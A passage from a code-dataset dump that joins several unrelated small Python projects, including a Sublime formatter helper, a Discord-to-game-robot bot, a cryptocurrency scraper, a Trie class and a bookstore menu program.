'syntaxes')\n if syntaxes and isinstance(syntaxes, list):\n syntaxes = list(map(str.lower, filter(None, syntaxes)))\n scopes = view.scope_name(0 if not is_selected else region.a).strip().lower().split(' ')\n for syntax in syntaxes:\n for scope in scopes:\n if 'source.' + syntax + '.embedded' in scope:\n return syntax\n if 'source.' + syntax == scope:\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if scope.endswith('.' + syntax):\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if '.' + syntax + '.' 
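get_assigned_syntax (its remaining passes continue below) tries progressively looser scope matches: an exact source.<syntax> or its .embedded variant first, then a suffix match, then infix and prefix matches. A toy illustration of the same first-match-wins cascade, with made-up scope strings:

def match_syntax(scopes, syntaxes):
    # Passes are ordered from most to least specific; the first hit wins.
    passes = [
        lambda sc, sy: sc == 'source.' + sy or 'source.' + sy + '.embedded' in sc,
        lambda sc, sy: sc.endswith('.' + sy),
        lambda sc, sy: '.' + sy + '.' in sc,
        lambda sc, sy: sc.startswith(sy + '.'),
    ]
    for test in passes:
        for sy in syntaxes:
            for sc in scopes:
                if test(sc, sy):
                    return sy
    return None

print(match_syntax(['text.html.markdown', 'source.json'], ['json', 'markdown']))  # json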
in scope:\n return syntax\n for syntax in syntaxes:\n for scope in scopes:\n if scope.startswith(syntax + '.'):\n return syntax\n return None\n log.error('Setting key \"syntaxes\" may not be empty and must be of type list: %s', syntaxes)\n return None\n\ndef get_args(uid):\n args = query(config, None, 'formatters', uid, 'args')\n if args and isinstance(args, list):\n return map(str, args)\n return None\n\ndef set_fix_cmds(cmd, uid):\n fix_cmds = query(config, None, 'formatters', uid, 'fix_commands')\n if fix_cmds and isinstance(fix_cmds, list) and cmd and isinstance(cmd, list):\n for x in fix_cmds:\n if isinstance(x, list):\n l = len(x)\n if 3 <= l <= 5:\n search = str(x[l-5])\n replace = str(x[l-4])\n index = int(x[l-3])\n count = int(x[l-2])\n position = int(x[l-1])\n if isinstance(index, int) and isinstance(count, int) and isinstance(position, int):\n for i, item in enumerate(cmd):\n item = str(item)\n if index == i:\n if l == 5:\n if search == item and position < 0:\n cmd.pop(i)\n else:\n cmd[i] = re.sub(r'%s' % search, replace, item, count)\n if l == 4:\n cmd[i] = replace\n if l == 3 and position < 0:\n cmd.pop(i)\n if position > -1:\n cmd.insert(position, cmd.pop(i))\n log.debug('Fixed arguments: %s', cmd)\n else:\n log.error('index, count and position of \"fix_commands\" must be of type int.')\n return None\n else:\n log.error('Items of \"fix_commands\" must be of type list.')\n return None\n return cmd\n\ndef prompt_error(text, name=None):\n if name:\n string = u'%s (%s):\\n\\n%s' % (PACKAGE_NAME, name, text)\n else:\n string = u'%s:\\n\\n%s' % (PACKAGE_NAME, text)\n sublime.error_message(string)\n\ndef setup_logger(name):\n formatter = logging.Formatter(fmt='▋[' + PACKAGE_NAME + '](%(threadName)s:%(filename)s#L%(lineno)s): [%(levelname)s] %(message)s')\n handler = logging.StreamHandler()\n handler.setFormatter(formatter)\n logger = logging.getLogger(name)\n logger.setLevel(logging.DEBUG)\n if logger.hasHandlers():\n logger.handlers.clear()\n logger.addHandler(handler)\n return logger\n","repo_name":"bitst0rm-pub/Formatter","sub_path":"modules/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":18258,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"75"} +{"seq_id":"22947165301","text":"#!/usr/bin/python\n\nimport sys\n\nbyName = {}\nregionfile = sys.argv[1]\n\nfor line in open(regionfile):\n f = line.strip().split()\n name = f[3]\n if name in byName:\n byName[name] += line\n else:\n byName[name] = line\n\nfor name in byName:\n fh = open(\"%s.txt\" % (name), 'w')\n print >> fh, byName[name],\n fh.close()\n\n \n","repo_name":"vforget/rare-variant-pipeline","sub_path":"bin/01_split.py","file_name":"01_split.py","file_ext":"py","file_size_in_byte":345,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"12447621863","text":"import sqlite3\nimport time\nimport matplotlib.pyplot as plt\n\n# Connect to the UsersDB database\nconn_usersdb = sqlite3.connect('UsersDB.sqlite')\ncur_usersdb = conn_usersdb.cursor()\n\n# cur_usersdb.executescript('''\n# DROP TABLE IF EXISTS PlotTable;\n#\n# CREATE TABLE PlotTable (\n# contest_id INTEGER,\n# rating_user1 INTEGER,\n# rating_user2 INTEGER\n# );\n# ''')\n\n# Extracting the data of the first User\ncur_usersdb.execute('''SELECT contest_id, newRating FROM User1''')\nuser1_data = cur_usersdb.fetchall()\n\n# Splitting contest_id's and ratings\ncontest_data1 = [data[0] for data in user1_data]\nrating_data1 = [data[1] for data in 
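set_fix_cmds above reads each fix_commands entry right-aligned as [search, replace, index, count, position]: a 5-item entry regex-substitutes inside one argument, a 4-item entry replaces the argument outright, and a 3-item entry only drops or repositions it. Replaying just the 5-item substitution branch on a hypothetical command list:

import re

cmd = ['/usr/bin/tool', '-c', 'cfg', '--mode=old']
search, replace, index, count = 'old', 'new', 3, 1
cmd[index] = re.sub(search, replace, cmd[index], count=count)
print(cmd)  # ['/usr/bin/tool', '-c', 'cfg', '--mode=new']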
user1_data]\n\n# Extracting the data of the second User\ncur_usersdb.execute('''SELECT contest_id, newRating FROM User2''')\nuser2_data = cur_usersdb.fetchall()\n\n# Splitting contest_id's and ratings\ncontest_data2 = [data[0] for data in user2_data]\nrating_data2 = [data[1] for data in user2_data]\n\n# Plotting the details of the first User\nplt.plot(contest_data1, rating_data1, color = 'k', linestyle = '-',\n marker = 'o', markerfacecolor = 'k', linewidth = 1.5,\n label = 'User1')\n\n# Plotting the details of the second User\nplt.plot(contest_data2, rating_data2, color = 'r', linestyle = '-',\n marker = 'o', markerfacecolor = 'r', linewidth = 1.5,\n label = 'User2')\n\n# Plot Figure settings\nplt.grid(True)\nmy_plot = plt.gca()\n\n# Useful labels in graph\nplt.xlabel('Contest id\\'s')\nplt.ylabel('Rating')\nplt.title('Codeforces User Comparison with Rating Graph')\n\n# Getting the legend outside by shrinking the main box to 85% of its size\nbox = my_plot.get_position()\nmy_plot.set_position([box.x0, box.y0, box.width * 0.85, box.height])\nplt.legend(loc = 'center left', bbox_to_anchor = (1, 0.5))\n\n# Autoscaling the view\nmy_plot.autoscale_view(tight = None, scalex = True, scaley = True)\n\nplt.show()\n\n\n# for data in user1_data:\n# cur_usersdb.execute('''INSERT INTO PlotTable (contest_id, rating_user1)\n# VALUES (?, ?)''', data)\n# conn_usersdb.commit()\n#\n# cur_usersdb.execute('''SELECT contest_id, newRating FROM User2''')\n# user2_data = cur_usersdb.fetchall()\n#\n# for data in user2_data:\n# #cur_usersdb.execute('''SELECT contest_id FROM PlotTable\n# # WHERE ''')\n# cur_usersdb.execute('''INSERT OR IGNORE INTO PlotTable (contest_id)\n# VALUES (?)''', (data[0],))\n# cur_usersdb.execute('''UPDATE PlotTable SET rating_user2 = ?\n# WHERE contest_id = ?''', (data[1], data[0]))\n# conn_usersdb.commit()\n#\n# cur_usersdb.execute('SELECT * FROM PlotTable')\n# all_data = cur_usersdb.fetchall()\n# all_data = sorted(all_data)\n# for data in all_data:\n# print data\n# #print all_data\n# all_user1_data = [(data[0], data[1]) for data in all_data]\n# all_user2_data = [(data[0], data[2]) for data in all_data]\n#\n# #for data in all_data:\n# # print data\n#\n# contest_data = [data[0] for data in all_data]\n# user1_data = [data[1] for data in all_data]\n# user2_data = [data[2] for data in all_data]\n\n# plt.plot(contest_data, user1_data, color = 'k', linestyle = '-',\n# marker = 'o', markerfacecolor = 'k', label = 'user1')\n# plt.plot(contest_data, user2_data, label = 'user2')\n# plt.xlabel('Contest id\\'s')\n# plt.ylabel('Rating')\n# plt.title('Codeforces User Comparison with Rating Graph')\n# plt.legend()\n#\n# plt.show()\n\n# Closing the connection\nconn_usersdb.close()\n","repo_name":"shubhambhattar/Codeforces-Comparator","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"38333362821","text":"\nfrom utils import data_utils, settings\n\n\nname_to_pubs_test = data_utils.load_json(settings.GLOBAL_DATA_DIR, 'name_to_pubs_test_100.json')\nname_to_pubs_train = data_utils.load_json(settings.GLOBAL_DATA_DIR, 'name_to_pubs_train_500.json')\n\n# Train\nTrainAuthorCount = 0\nTrainPaperCount = 0\nfor name in name_to_pubs_train:\n TrainAuthorCount = TrainAuthorCount + 1\n object = name_to_pubs_train[name]\n for pid in object:\n TrainPaperCount = TrainPaperCount + 1\n\nprint (\"TrainAuthorCount: \", TrainAuthorCount)\nprint (\"TrainPaperCount: \", 
TrainPaperCount)\n\n# Test\nTestAuthorCount = 0\nTestPaperCount = 0\nfor name in name_to_pubs_test:\n TestAuthorCount = TestAuthorCount + 1\n object = name_to_pubs_test[name]\n for pid in object:\n TestPaperCount = TestPaperCount + 1\n\nprint (\"TestAuthorCount: \", TestAuthorCount)\nprint (\"TestPaperCount: \", TestPaperCount)\n\n\n","repo_name":"shanxuanchen/AttentionBasedNameDisambiguation","sub_path":"statistic/getTrainDataSets.py","file_name":"getTrainDataSets.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"29804023723","text":"import socket\nimport discord\n\n\n#Here we specify the stem channel\nStem = input(\"Enter the unique Stem channel \")\n#Discord bot token\nToken = input(\"Enter your Discord bot token \")\n\nsock = socket.socket()\n\ndef safe_send(s):\n if isinstance(s, int): s = chr(s).encode('ascii')\n if isinstance(s, str): s = s.encode('utf-8')\n i = 0\n while i < len(s): i += sock.send(s[i:])\n\ndef send_package(_type, _id, _message=None):\n pack = chr(_type).encode('ascii')\n if _type == 3 or _type == 4:\n pack += _id\n else:\n pack += chr(len(_id)).encode('ascii')\n pack += _id.encode('utf-8')\n if _message: pack += _message.encode('utf-8')\n \n safe_send(len(pack) // 256)\n safe_send(len(pack) % 256)\n safe_send(pack)\n\ndef send(channel, msg):\n try:\n send_package(0, channel, msg)\n except ConnectionAbortedError:\n global sock\n sock = socket.socket()\n sock.connect(('stem.fomalhaut.me', 5733))\n send_package(0, channel, msg)\n\nsock.connect(('stem.fomalhaut.me', 5733))\n\nclass MyClient(discord.Client):\n async def on_message(self, message):\n if message.content.startswith('w'):\n await message.channel.send('Forward')\n print(\"Forward\")\n send(Stem, 'w')\n\n elif message.content.startswith('s'):\n await message.channel.send('Back')\n print(\"Back\")\n send(Stem, 's')\n\n elif message.content.startswith('d'):\n await message.channel.send('Turn Right')\n print(\"Turn Right\")\n send(Stem, 'd')\n\n elif message.content.startswith('a'):\n await message.channel.send('Turn Left')\n print(\"Turn Left\")\n send(Stem, 'a')\n \n elif message.content.startswith('z'):\n await message.channel.send('Down')\n print(\"Down\")\n send(Stem, 'z')\n\n elif message.content.startswith('x'):\n await message.channel.send('Up')\n print(\"Up\")\n send(Stem, 'x')\n\n elif message.content.startswith('g'):\n await message.channel.send('Place')\n print(\"Place\")\n send(Stem, 'g')\n \n elif message.content.startswith('t'):\n await message.channel.send('Drop')\n print(\"Drop\")\n send(Stem, 't')\n \nintents = discord.Intents(guilds=True, messages=True)\nclient = MyClient(intents=intents)\nclient.run(Token)","repo_name":"Bumer-32/Minecraft-opencomputers","sub_path":"DisRob/DisRob.py","file_name":"DisRob.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"75"} +{"seq_id":"38146001552","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[27]:\n\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport csv\nimport os\n\n\ndef get_coins():\n soup = create_soup(\"https://coinmarketcap.com/coins\")\n \n coin_names = []\n coin_symbols = []\n coin_urls = []\n \n coin_tags = soup.select(\".sc-16r8icm-0.dnwuAU\")\n for x in coin_tags:\n p_tags = x.find_all(\"p\")\n name = p_tags[0].text\n symbol = p_tags[1].text\n coin_names.append(name)\n coin_symbols.append(symbol)\n\n a_tags = 
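send_package in the Discord bot above frames every packet as a two-byte big-endian length, then a type byte, a length-prefixed channel id and the message. A sketch of the matching decoder for the common (type 0) layout, assuming the same framing on the receiving side:

def decode_packet(buf):
    total = buf[0] * 256 + buf[1]      # two-byte length header
    payload = buf[2:2 + total]
    ptype = payload[0]                 # packet type
    id_len = payload[1]                # length of the channel id
    channel = payload[2:2 + id_len].decode('utf-8')
    message = payload[2 + id_len:].decode('utf-8')
    return ptype, channel, message

# Round-trip of a type-0 frame carrying 'w' for channel 'abc':
frame = bytes([0, 6, 0, 3]) + b'abc' + b'w'
print(decode_packet(frame))  # (0, 'abc', 'w')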
x.find_all(\"a\", href = True)\n for a_tag in a_tags:\n tag = \"coinmarketcap.com\" + a_tag[\"href\"]\n coin_urls.append(tag)\n \n \n #Beautiful Soup seems to render the page differently. On analyzing the soup structure using .prettify() function\n #we see that top 10 coins have different class and the rest belong to some other class. \n #So we change the coin_tags to get tags with that class.\n \n coin_tags = soup.select(\".sc-14kwl6f-0.fletOv\")\n for i in coin_tags:\n coin_symbols.append(i.find(\"span\", attrs = {\"class\":\"crypto-symbol\"}).text)\n coin_urls.append(\"coinmarketcap.com\" + i.find(\"a\", attrs = {\"class\":\"cmc-link\"})[\"href\"])\n coin_names.append(i.find(\"span\", attrs = {\"class\":\"circle\"}).find_next().text)\n\n \n #Fetching just the top 50 coins\n coin_names = coin_names[:50]\n coin_symbols = coin_symbols[:50]\n coin_urls = coin_urls[:50]\n \n #Writing to the coins.csv file.\n with open('coins.csv', mode='w+') as coins_file:\n writer = csv.writer(coins_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n \n col_names = ['SNO', 'Name', \"Symbol\", \"URL\"]\n\n writer.writerow(col_names)\n for i in range(1, 51):\n row = [str(i), coin_names[i-1], coin_symbols[i-1], coin_urls[i-1]]\n writer.writerow(row)\n \n \ndef get_coin_data(coin_symbol):\n #Fetching the URL from coins.csv file\n url = fetch_url('coins.csv', coin_symbol)\n \n if url == None:\n print(\"No Such Coin Found\")\n return\n else:\n soup2 = create_soup(url)\n \n data_dict = {}\n \n #Fetching name, symbol, watchlist, website and supply chain %\n name_symbol_tag = soup2.select(\".sc-1q9q90x-0.iYFMbU.h1___3QSYG\")\n name = name_symbol_tag[0].text\n symbol = name_symbol_tag[0].find_next(\"small\").text\n name = name[:len(name) - len(symbol)]\n\n watchlist_tag = soup2.select(\".namePill___3p_Ii\")\n watchlist = watchlist_tag[2].text\n\n website_tag = soup2.select(\".button___2MvNi\")\n website = website_tag[0].text\n\n supply_chain_percent_tag = soup2.select(\".supplyBlockPercentage___1g1SF\")\n supply_chain_percent = supply_chain_percent_tag[0].text\n\n data_dict[\"Symbol\"] = symbol\n data_dict[\"Name\"] = name\n data_dict[\"Watchlist\"] = watchlist\n data_dict[\"Website\"] = website\n data_dict[\"Supply Chain %\"] = supply_chain_percent\n \n #Fetching price, volume/market cap, market dominance, rank, market cap, all time high and low data \n #from the table on the website\n th = soup2.select(\"th\")\n td = soup2.select(\"td\")\n for i in range(len(th)):\n if th[i].text == (name + \" Price\"):\n data_dict[\"Price\"] = td[i].text\n \n if th[i].text == \"Volume / Market Cap\":\n data_dict[\"Volume / Market Cap\"] = td[i].text\n \n if th[i].text == \"Market Dominance\":\n data_dict[\"Market Dominance\"] = td[i].text\n \n if th[i].text == \"Market Rank\":\n data_dict[\"Market Rank\"] = td[i].text\n \n if th[i].text == \"Market Cap\":\n data_dict[\"Market Cap\"] = td[i].find_next(\"span\").text\n \n if th[i].find_next(\"div\").text == \"All Time High\":\n data_dict[\"All Time High Date\"] = th[i].find_next(\"small\").text\n data_dict[\"All Time High Price\"] = td[i].find_next(\"span\").text\n \n if th[i].find_next(\"div\").text == \"All Time Low\":\n data_dict[\"All Time Low Date\"] = th[i].find_next(\"small\").text\n data_dict[\"All Time Low Price\"] = td[i].find_next(\"span\").text\n \n \n\n #Fetching basic info about the coin.\n #The id for this information's tag seems to have three different type- \n #1 -> #what-is--\n #2 -> #what-is-\n #3 -> The third type of id is used when the coin name is 
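The th/td loop above relies on soup2.select returning header and value cells in matching order, pairing th[i] with td[i]. When that assumption holds, the pairing collapses into a dict lookup; a small sketch with hypothetical cell texts:

headers = ['Market Rank', 'Market Dominance', 'Volume / Market Cap']
values = ['#1', '42.1%', '0.0456']
stats = dict(zip(headers, values))
print(stats['Market Rank'])  # '#1'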
made of more than 1 word like Ethereum Classic. In that case \n #there is a hyphen between the words.\n if len(name.split(\" \")) > 1:\n name = name.replace(\" \", \"-\")\n what_tag_id = \"#what-is-\" + name.lower() + \"-\" + symbol.lower()\n what_tag = soup2.select(what_tag_id)\n\n if len(what_tag) == 0:\n what_tag_id = \"#what-is-\" + name.lower()\n what_tag = soup2.select(what_tag_id)\n if len(what_tag) == 0:\n data_dict[\"What is ?\"] = \"N/A\"\n\n else:\n what_tag = what_tag[0]\n what = \"\"\n while what_tag.find_next(\"p\"):\n if what_tag.find_next_sibling().name != \"p\":\n break\n what += what_tag.find_next(\"p\").text\n what_tag = what_tag.find_next(\"p\") \n data_dict[\"What is ?\"] = what\n\n else:\n what_tag = what_tag[0]\n what = \"\"\n while what_tag.find_next(\"p\"):\n if what_tag.find_next_sibling().name != \"p\":\n break\n what += what_tag.find_next(\"p\").text\n what_tag = what_tag.find_next(\"p\") \n data_dict[\"What is ?\"] = what\n \n \n #Fetching the Founder info of the coin.\n founder_tag_id = \"#who-are-the-founders-of-\" + name.lower()\n founder_tag = soup2.select(founder_tag_id)\n if len(founder_tag) == 0:\n data_dict[\"Who Are The Founders\"] = \"N/A\"\n else:\n founder_tag = founder_tag[0]\n founder = \"\"\n while founder_tag.find_next(\"p\"):\n if founder_tag.find_next_sibling().name != \"p\":\n break\n founder += founder_tag.find_next(\"p\").text\n founder_tag = founder_tag.find_next(\"p\")\n data_dict[\"Who Are The Founders\"] = founder\n\n \n #Fetching the unique things about the coin.\n unique_tag_id = \"#what-makes-\" + name.lower() + \"-unique\"\n unique_tag = soup2.select(unique_tag_id)\n if len(unique_tag) == 0:\n data_dict[\"What Makes it Unique\"] = \"N/A\"\n else:\n unique_tag = unique_tag[0]\n unique = \"\"\n ct = 0\n while True:\n if unique_tag.find_next_sibling().name != \"p\":\n break\n unique += unique_tag.find_next(\"p\").text\n unique_tag = unique_tag.find_next(\"p\")\n\n data_dict[\"What Makes it Unique\"] = unique\n \n \n \n col_names = ['Symbol', 'Name', 'Watchlist', 'Website', 'Supply Chain %', 'Price', 'Volume / Market Cap',\n 'Market Dominance', 'Market Rank', 'Market Cap', 'All Time High Date', 'All Time High Price',\n 'All Time Low Date', 'All Time Low Price', 'What is ?', 'Who Are The Founders',\n 'What Makes it Unique']\n \n #Storing in the File\n write_to_file(\"coins_data.csv\", col_names, data_dict)\n \n\n#Function to create a soup object\ndef create_soup(url):\n webpage = requests.get(url)\n soup = BeautifulSoup(webpage.text, 'lxml')\n return soup\n\n\n#Function to fetch the url\ndef fetch_url(filename, symbol):\n url = \"\"\n with open(filename, mode='r') as csv_file:\n csv_reader = csv.DictReader(csv_file)\n for row in csv_reader:\n if row[\"Symbol\"] == symbol:\n url = row[\"URL\"]\n \n if url == \"\":\n print(\"No Such Coin Found\")\n return None\n else:\n url = \"https://\" + url\n return url\n \n\n#Funtion to write a python dictionary to a csv file\ndef write_to_file(filename, col_names, data_dict):\n if os.path.isfile(filename):\n with open(filename, mode='a', encoding = \"utf-8\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames = col_names)\n writer.writerow(data_dict) \n csv_file.close()\n else:\n with open(filename, mode='w+', encoding = \"utf-8\") as csv_file:\n writer = csv.DictWriter(csv_file, fieldnames=col_names)\n writer.writeheader()\n writer.writerow(data_dict)\n csv_file.close()\n \n 
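write_to_file above switches between 'w+' and 'a' modes on os.path.isfile so the header row is written only once. An equivalent sketch that always appends and only emits the header while the file is empty (append_row is a hypothetical name; the csv module also recommends newline=''):

import csv, os

def append_row(filename, col_names, row):
    is_new = not os.path.isfile(filename) or os.path.getsize(filename) == 0
    with open(filename, 'a', newline='', encoding='utf-8') as f:
        writer = csv.DictWriter(f, fieldnames=col_names)
        if is_new:
            writer.writeheader()
        writer.writerow(row)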
\n\n","repo_name":"pankajshivnani2001/ScrapingCoinmarketcap","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19647097518","text":"import requests\nimport json\n\n\n# Exercise 1: practice using a civil IoT API, e.g. the records returned by air-quality or earthquake sensing stations.\n# API request: Central Weather Bureau earthquake monitoring station SensorThings API service URL \nr = requests.get(\"https://sta.ci.taiwan.gov.tw/STA_Earthquake_v2/v1.0/Things\")\n\nresult_1 = json.loads(r.text)\nraw_data_q1 = result_1['value']\n\n\n# Exercise 2: practice working with the OGC SensorThings API: fetch the EPA monitoring station location data and inspect the downloaded content.\n\nr_q2 = requests.get(\"https://sta.ci.taiwan.gov.tw/STA_AirQuality_EPAIoT/v1.0/Things\")\n\nresult_2 = json.loads(r_q2.text)\nraw_data_q2 = result_2['value']\n\n\n\n# Exercise 3: \n# Based on the sensor descriptions of each EPA station downloaded in Exercise 2, follow the Datastreams and Locations links,\n# and, after entering a Datastream, open its Observations URL to inspect the downloaded content and check whether Observations contain the records of the individual sensors.\n\n# Take the first record as an example\n\nraw_data_q3 = raw_data_q2[0]\n\n\n# Get \"Datastreams@iot.navigationLink\" \n\nstream = raw_data_q3[\"Datastreams@iot.navigationLink\"]\n\n# The stream endpoint can be queried via the API to fetch more data\n\nprint (stream)\n\n# Get \"Locations@iot.navigationLink\"\n\nlocation = raw_data_q3[\"Locations@iot.navigationLink\"]\n\n# The location endpoint can be queried via the API to fetch more data\n\nprint(location)\n\n\n\n\n\n\n\n\n\n","repo_name":"HenryYHHsu/AIOT","sub_path":"D5/D5.py","file_name":"D5.py","file_ext":"py","file_size_in_byte":1372,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36876138564","text":"import network\nimport joblib\nimport numpy as np\nfrom keras.callbacks import EarlyStopping\n\ndef run():\n data = joblib.load('data/data.pkl')\n X, y = [], []\n for k, v in data.items():\n for vv in v:\n X.append(vv)\n y.append(k)\n\n model = network.building_network()\n print('Model summary...')\n print(model.summary())\n print('Training model...')\n\n early_stopping = EarlyStopping(patience=3)\n model.fit(np.array(X), np.array(y), batch_size=128, epochs=10, callbacks=[early_stopping])\n\n\nif __name__ == '__main__':\n run()","repo_name":"congson1293/signature_compare","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"14747224936","text":"import random\n\nheros = [\"Shahrukh Khan\", \"Salman Khan\", \"Hrithik Roshan\", \"Amir Khan\", \"Ranveer Singh\"]\n\n\n# randint is inclusive at both ends, so the upper bound must be len - 1\na = random.randint(0, len(heros) - 1)\n\nname = input(\"Enter your name: \")\n\nprint(name + \" looks like \" + heros[a])","repo_name":"sauravs1001/CodingChallengeFor100Days","sub_path":"Day-6/facebook_like_game.py","file_name":"facebook_like_game.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72912692081","text":"class Trie:\n\n def __init__(self):\n \"\"\"\n Initialize your data structure here.\n \"\"\"\n self.childs = {};\n self.end = False;\n\n def insert(self, word: str) -> None:\n \"\"\"\n Inserts a word into the trie.\n \"\"\"\n crawl = self;\n \n for c in word:\n \n if not c in crawl.childs.keys():\n crawl.childs[c] = Trie();\n \n crawl = crawl.childs[c];\n \n crawl.end = True;\n \n\n def search(self, word: str) -> bool:\n \"\"\"\n Returns if the word is in the trie.\n \"\"\"\n crawl = self;\n \n for c in word:\n \n if not c in crawl.childs.keys():\n return False;\n \n crawl = crawl.childs[c];\n \n if crawl.end is True:\n return 
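The SensorThings requests above read a single page from the 'value' array; such services typically page large collections and advertise the next page under '@iot.nextLink'. A hedged sketch of draining a collection by following that link:

import requests

def fetch_all_things(url):
    things = []
    while url:
        page = requests.get(url).json()
        things.extend(page.get('value', []))
        url = page.get('@iot.nextLink')  # absent on the last page
    return things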
True;\n \n return False;\n\n def startsWith(self, prefix: str) -> bool:\n \"\"\"\n Returns if there is any word in the trie that starts with the given prefix.\n \"\"\"\n crawl = self;\n \n for c in prefix:\n \n if not c in crawl.childs.keys():\n return False;\n \n crawl = crawl.childs[c];\n \n \n return True;\n\n\n# Your Trie object will be instantiated and called as such:\n# obj = Trie()\n# obj.insert(word)\n# param_2 = obj.search(word)\n# param_3 = obj.startsWith(prefix)","repo_name":"AndreiFlorescu/Leetcode","sub_path":"Python3/208-implement-trie-prefix-tree.py","file_name":"208-implement-trie-prefix-tree.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22239340147","text":"import Calculator\nimport BookStore\nimport DLList\nimport ChainedHashTable\nimport BinaryTree\nimport BinarySearchTree\n\n\ndef menu_calculator() :\n calculator = Calculator.Calculator()\n option=\"\"\n while option != '0':\n print (\"\"\"\n 1 Check mathematical expression \n 2 Set variable to values\n 3 introduce expression\n 4 print expression\n 5 Evaluate expression\n 0 Return to main menu\n \"\"\")\n option=input() \n if option==\"1\":\n expression = input(\"Introduce the mathematical expression: \")\n if calculator.matched_expression(expression) :\n print(f\"{expression} is a valid expression\")\n else:\n print(f\"{expression} is invalid expression\")\n elif option == \"2\":\n key = input(\"Input your variable: \")\n if key != '':\n value =input(\"Input your value: \")\n calculator.set_variable(key,float(value))\n else:\n value = input(\"Introduce your value: \")\n calculator.set_variable(key,value)\n # calculator.set_variable(key, value)\n elif option == \"3\":\n x = 1\n while x == 1:\n expression = input(\"Introduce a valid mathematical expression: \")\n if calculator.matched_expression(expression):\n print(f\"{expression} is a valid expression\")\n x = 0\n\n else:\n print(f\"{expression} is invalid expression\")\n x = 1\n\n\n elif option == \"4\":\n for i in expression:\n if calculator.dict.find(i) == None:\n print(i, end='')\n else:\n print(calculator.dict.find(i), end='')\n elif option == \"5\":\n print(calculator.evaluate(expression))\n\n\n ''' \n Add the menu options when needed\n '''\n\ndef menu_bookstore_system() :\n bookStore = BookStore.BookStore()\n option=\"\"\n while option != '0':\n print(\"\"\"\n s FIFO shopping cart\n r Random shopping cart\n 1 Load book catalog\n 2 Remove a book by index from catalog\n 3 Add a book by index to shopping cart\n 4 Remove from the shopping cart\n 5 Search book by infix\n 6 Reverse the order of the shopping cart\n 7 Best selling book\n 8 search by title(new function)\n 9 search by prefix( binary lab)\n 10 Traverse through bookstore txt\n 11 SEARCH BESTSELLING(BINARY HEAP)\n 12 merge sort\n 13 quick sort\n 14 prefix binary search\n 15 bfs search\n 16 dfs search\n 0 Return to main menu\n \"\"\")\n option=input() \n if option==\"r\":\n bookStore.setRandomShoppingCart()\n elif option==\"s\":\n bookStore.setShoppingCart()\n elif option==\"1\":\n file_name = input(\"Introduce the name of the file: \")\n bookStore.loadCatalog(file_name) \n #bookStore.pathLength(0, 159811)\n elif option==\"2\":\n i = int((\"Introduce the index to remove from catalog: \"))\n bookStore.removeFromCatalog(i)\n elif option==\"3\":\n i = int(input(\"Introduce the index to add to shopping cart: \"))\n bookStore.addBookByIndex(i)\n elif option==\"4\":\n bookStore.removeFromShoppingCart()\n 
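Following the usage comment in the Trie file above, a short driver that exercises all three operations:

t = Trie()
t.insert('apple')
print(t.search('apple'))     # True
print(t.search('app'))       # False: 'app' is only a prefix, not an inserted word
print(t.startsWith('app'))   # True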
elif option==\"5\":\n infix = input(\"Introduce the query to search: \")\n bookStore.searchBookByInfix(infix)\n elif option==\"6\":\n bookStore.reverseshoppingCart()\n elif option==\"7\":\n bookStore.bestSelling()\n elif option==\"8\":\n title = input(\"Introduce the title:\")\n bookStore.title_of_book(title)\n elif option == \"9\":\n prefix = input(\"Introduce prefix: \")\n bookStore.indexSortedTitle(prefix)\n elif option == \"10\":\n choice = \"\"\n while choice != \"0\":\n print(\"\"\"\n 1 Test In Order Traversal\n 2 Test Pre Order Traversal\n 3 Test Post Order Traversal\n 4 Test Breath First Traversal\n 0 Return to Bookstore System menu\n \"\"\")\n choice = input()\n if choice == \"1\":\n in_order = bookStore.sortedTitle.in_order(bookStore.sortedTitle.r, [])\n for book in in_order:\n with open(\"books_in_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"2\":\n pre_order = bookStore.sortedTitle.pre_order(bookStore.sortedTitle.r, [])\n for book in pre_order:\n with open(\"books_pre_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"3\":\n post_order = bookStore.sortedTitle.post_order(bookStore.sortedTitle.r, [])\n for book in post_order:\n with open(\"books_post_order.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n\n elif choice == \"4\":\n breath_first_order = bookStore.sortedTitle.bf_traverse()\n for book in breath_first_order:\n with open(\"books_bftraversal.txt\", \"a\", encoding='UTF8') as f:\n f.write(f\"\\n{book}\")\n elif option == \"11\":\n prefix = input(\"Introduce prefix: \")\n bookStore.SearchInfixBestSelling(prefix)\n elif option == \"12\":\n bookStore.mergeSort()\n elif option == \"13\":\n bookStore.quickSort()\n elif option == \"14\":\n prefix = str(input(\"enter prefix: \"))\n bookStore.binarySearchbyTitle(prefix)\n elif option == \"15\":\n index = int(input(\"Enter the index of the starting book: \"))\n index_location = int(input(\"Enter the distance from the starting index: \"))\n 